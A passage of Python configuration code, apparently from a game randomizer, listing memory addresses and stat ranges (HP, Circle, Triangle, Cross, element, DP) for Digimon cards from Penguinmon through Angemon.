max_value=Max_Circle_Multiplier(320,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Triangle",
addresses=[0x2668cec],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(180,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(180,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Cross",
addresses=[0x2668d08],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Cross Effect",
addresses=[0x2668d94],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gizamon 065
Attribute(
name="Gizamon Element",
addresses=[0x2668f36],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 65),
max_value=Get_Element_Type(16, 0, 65),
is_little_endian=True, ),
Attribute(
name="Gizamon +DP",
addresses=[0x2668f38],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gizamon HP",
addresses=[0x2668f3a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(650,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(650,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Circle",
addresses=[0x2668f3c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(260,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(260,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2668f58],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Cross",
addresses=[0x2668f74],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,rookie_modifier,11),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,rookie_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Cross Effect",
addresses=[0x2669000],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Otamamon 066
Attribute(
name="Otamamon Element",
addresses=[0x2669072],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 66),
max_value=Get_Element_Type(16, 0, 66),
is_little_endian=True, ),
Attribute(
name="Otamamon +DP",
addresses=[0x2669074],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Otamamon HP",
addresses=[0x2669076],
number_of_bytes=2,
min_value=Min_HP_Multiplier(710,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(710,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Circle",
addresses=[0x2669078],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(330,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(330,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Triangle",
addresses=[0x2669094],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(130,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(130,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Cross",
addresses=[0x26690b0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Cross Effect",
addresses=[0x266913c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#SnowAgumon 067
Attribute(
name="SnowAgumon Element",
addresses=[0x26691ae],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 67),
max_value=Get_Element_Type(16, 0, 67),
is_little_endian=True, ),
Attribute(
name="SnowAgumon +DP",
addresses=[0x26691b0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="SnowAgumon HP",
addresses=[0x26691b2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(720,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(720,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Circle",
addresses=[0x26691b4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(160,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(160,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Triangle",
addresses=[0x26691d0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Cross",
addresses=[0x26691ec],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(220,ice_special_modifier,rookie_modifier,4),
max_value=Max_Cross_Multiplier(220,ice_special_modifier,rookie_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Cross Effect",
addresses=[0x2669278],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#SnowGoburimon 068
Attribute(
name="SnowGoburimon Element",
addresses=[0x26692ea],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 68),
max_value=Get_Element_Type(16, 0, 68),
is_little_endian=True, ),
Attribute(
name="SnowGoburimon +DP",
addresses=[0x26692ec],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="SnowGoburimon HP",
addresses=[0x26692ee],
number_of_bytes=2,
min_value=Min_HP_Multiplier(770,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(770,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Circle",
addresses=[0x26692f0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(230,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(230,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Triangle",
addresses=[0x266930c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(230,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(230,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Cross",
addresses=[0x2669328],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(230,ice_special_modifier,rookie_modifier,0),
max_value=Max_Cross_Multiplier(230,ice_special_modifier,rookie_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Cross Effect",
addresses=[0x26693b4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Valkyrimon 069
Attribute(
name="Valkyrimon Element",
addresses=[0x2669426],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 69),
max_value=Get_Element_Type(32, 3, 69),
is_little_endian=True, ),
Attribute(
name="Valkyrimon +DP",
addresses=[0x2669428],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Valkyrimon HP",
addresses=[0x266942a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1590,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1590,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Circle",
addresses=[0x266942c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(840,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(840,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Triangle",
addresses=[0x2669448],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Cross",
addresses=[0x2669464],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(350,nature_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(350,nature_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Cross Effect",
addresses=[0x26694f0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Seraphimon 070
Attribute(
name="Seraphimon Element",
addresses=[0x2669562],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 70),
max_value=Get_Element_Type(32, 3, 70),
is_little_endian=True, ),
Attribute(
name="Seraphimon +DP",
addresses=[0x2669564],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Seraphimon HP",
addresses=[0x2669566],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1650,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1650,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Circle",
addresses=[0x2669568],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(900,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(900,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Triangle",
addresses=[0x2669584],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(510,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(510,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x26695a0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(420,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(420,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Cross Effect",
addresses=[0x266962c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Magnadramon 071
Attribute(
name="Magnadramon Element",
addresses=[0x266969e],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 71),
max_value=Get_Element_Type(32, 3, 71),
is_little_endian=True, ),
Attribute(
name="Magnadramon +DP",
addresses=[0x26696a0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Magnadramon HP",
addresses=[0x26696a2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1870,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1870,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Circle",
addresses=[0x26696a4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(800,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(800,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Triangle",
addresses=[0x26696c0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(610,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(610,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
#Magnadramon's cross isn't in a predictable place for some reason, lots of random text in between
Attribute(
name="Magnadramon Cross",
addresses=[0x266980C],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,4),
max_value=Max_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Cross Effect",
addresses=[0x2669898],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#AeroVeedramon 072
Attribute(
name="AeroVeedramon Element",
addresses=[0x266990a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 72),
max_value=Get_Element_Type(32, 3, 72),
is_little_endian=True, ),
Attribute(
name="AeroVeedramon +DP",
addresses=[0x266990c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="AeroVeedramon HP",
addresses=[0x266990e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1430,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1430,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Circle",
addresses=[0x2669910],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(750,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(750,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Triangle",
addresses=[0x266992c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Cross",
addresses=[0x2669948],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(360,nature_special_modifier,ultimate_modifier,1),
max_value=Max_Cross_Multiplier(360,nature_special_modifier,ultimate_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Cross Effect",
addresses=[0x26699d4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Rosemon 073
Attribute(
name="Rosemon Element",
addresses=[0x2669a46],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 73),
max_value=Get_Element_Type(32, 3, 73),
is_little_endian=True, ),
Attribute(
name="Rosemon +DP",
addresses=[0x2669a48],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Rosemon HP",
addresses=[0x2669a4a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1210,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1210,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Circle",
addresses=[0x2669a4c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Triangle",
addresses=[0x2669a68],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Cross",
addresses=[0x2669a84],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,9),
max_value=Max_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,9),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Cross Effect",
addresses=[0x2669b10],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#HerculesKabuterimon 074
Attribute(
name="HerculesKabuterimon Element",
addresses=[0x2669b82],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 74),
max_value=Get_Element_Type(32, 3, 74),
is_little_endian=True, ),
Attribute(
name="HerculesKabuterimon +DP",
addresses=[0x2669b84],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon HP",
addresses=[0x2669b86],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1700,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1700,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Circle",
addresses=[0x2669b88],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(790,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(790,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Triangle",
addresses=[0x2669ba4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(490,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(490,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Cross",
addresses=[0x2669bc0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,nature_special_modifier,ultimate_modifier,1),
max_value=Max_Cross_Multiplier(250,nature_special_modifier,ultimate_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Cross Effect",
addresses=[0x2669c4c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MagnaAngemon 075
Attribute(
name="MagnaAngemon Element",
addresses=[0x2669cbe],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 75),
max_value=Get_Element_Type(32, 3, 75),
is_little_endian=True, ),
Attribute(
name="MagnaAngemon +DP",
addresses=[0x2669cc0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MagnaAngemon HP",
addresses=[0x2669cc2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1320,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1320,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Circle",
addresses=[0x2669cc4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(770,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(770,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Triangle",
addresses=[0x2669ce0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(570,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(570,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Cross",
addresses=[0x2669CFC],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Cross Effect",
addresses=[0x2669d88],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Silphymon 076
Attribute(
name="Silphymon Element",
addresses=[0x2669dfa],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 76),
max_value=Get_Element_Type(32, 3, 76),
is_little_endian=True, ),
Attribute(
name="Silphymon +DP",
addresses=[0x2669dfc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Silphymon HP",
addresses=[0x2669dfe],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1540,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1540,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Circle",
addresses=[0x2669e00],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(680,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(680,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Triangle",
addresses=[0x2669e1c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(500,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(500,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Cross",
addresses=[0x2669e38],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,nature_special_modifier,ultimate_modifier,3),
max_value=Max_Cross_Multiplier(400,nature_special_modifier,ultimate_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Cross Effect",
addresses=[0x2669ec4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Angewomon 077
Attribute(
name="Angewomon Element",
addresses=[0x2669f36],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 77),
max_value=Get_Element_Type(32, 3, 77),
is_little_endian=True, ),
Attribute(
name="Angewomon +DP",
addresses=[0x2669f38],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Angewomon HP",
addresses=[0x2669f3a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Circle",
addresses=[0x2669f3c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Triangle",
addresses=[0x2669f58],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(520,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(520,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Cross",
addresses=[0x2669f74],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(330,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(330,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Cross Effect",
addresses=[0x266a000],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Lillymon 078
Attribute(
name="Lillymon Element",
addresses=[0x266a1a2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 78),
max_value=Get_Element_Type(32, 3, 78),
is_little_endian=True, ),
Attribute(
name="Lillymon +DP",
addresses=[0x266a1a4],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Lillymon HP",
addresses=[0x266a1a6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1100,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1100,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Circle",
addresses=[0x266a1a8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Triangle",
addresses=[0x266a1c4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(340,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(340,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Cross",
addresses=[0x266a1e0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,ultimate_modifier,9),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,ultimate_modifier,9),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Cross Effect",
addresses=[0x266a26c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MegaKabuterimon 079
Attribute(
name="MegaKabuterimon Element",
addresses=[0x266a2de],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 79),
max_value=Get_Element_Type(32, 3, 79),
is_little_endian=True, ),
Attribute(
name="MegaKabuterimon +DP",
addresses=[0x266a2e0],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon HP",
addresses=[0x266a2e2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1480,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1480,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Circle",
addresses=[0x266a2e4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Triangle",
addresses=[0x266a300],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(400,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(400,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Cross",
addresses=[0x266a31c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,ultimate_modifier,5),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,ultimate_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Cross Effect",
addresses=[0x266a3a8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Piximon 080
Attribute(
name="Piximon Element",
addresses=[0x266a41a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 80),
max_value=Get_Element_Type(32, 3, 80),
is_little_endian=True, ),
Attribute(
name="Piximon +DP",
addresses=[0x266a41c],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Piximon HP",
addresses=[0x266a41e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Circle",
addresses=[0x266a420],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(670,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(670,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Triangle",
addresses=[0x266a43c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(430,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(430,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Cross",
addresses=[0x266a458],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,0),
max_value=Max_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Cross Effect",
addresses=[0x266a4e4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Veedramon 081
Attribute(
name="Veedramon Element",
addresses=[0x266a556],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 81),
max_value=Get_Element_Type(32, 2, 81),
is_little_endian=True, ),
Attribute(
name="Veedramon +DP",
addresses=[0x266a558],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Veedramon HP",
addresses=[0x266a55a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(880,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(880,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Circle",
addresses=[0x266a55c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(500,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(500,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Triangle",
addresses=[0x266a578],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Cross",
addresses=[0x266a594],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,champion_modifier,1),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,champion_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Cross Effect",
addresses=[0x266a620],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Angemon 082
Attribute(
name="Angemon Element",
addresses=[0x266a692],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 82),
max_value=Get_Element_Type(32, 2, 82),
is_little_endian=True, ),
Attribute(
name="Angemon +DP",
addresses=[0x266a694],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Angemon HP",
addresses=[0x266a696],
number_of_bytes=2,
min_value=Min_HP_Multiplier(940,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(940,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Circle",
addresses=[0x266a698],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Triangle",
addresses=[0x266a6b4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Cross",
addresses=[0x266a6d0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(260,nature_special_modifier,champion_modifier,14),
max_value=Max_Cross_Multiplier(260,nature_special_modifier,champion_modifier,14),
min_max_interval=10,
is_little_endian=True,),
